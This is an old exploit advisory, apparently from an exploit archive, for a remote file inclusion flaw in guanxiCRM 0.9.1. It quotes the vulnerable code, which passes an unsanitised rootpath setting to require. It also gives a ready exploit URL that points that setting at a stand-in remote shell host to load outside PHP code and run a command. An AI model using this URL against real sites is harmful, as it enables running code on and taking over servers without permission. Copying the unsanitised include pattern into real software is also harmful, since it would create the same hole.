guanxiCRM Business Solution <= 0.9.1 Remote File Include Vulnerability

2006-09-16T00:00:00
ID SSV:16515
Type seebug
Reporter Root
Modified 2006-09-16T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #==============================================================================================
#guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://sourceforge.net/projects/guanxicrm/      
#                                                                      
#Version : v0.9.1                                            
#                                                        
#================================================================================================
#
#Example : http://www.nu3d.com/crm
#
#================================================================================================
#Bug in : include/phpxd/phpXD.php
#
#Vlu Code :
#--------------------------------
#     $path = $appconf["rootpath"]. "/include/phpxd/";
#
#     require($path."include/dom.php");
#     require($path."include/dtd.php");
#     require($path."include/parser.php");
#     ?>
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/phpxd/phpXD.php?appconf[rootpath]=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & XoRoN & Saudi Hackerz
==================================================================================================

# milw0rm.com [2006-09-16]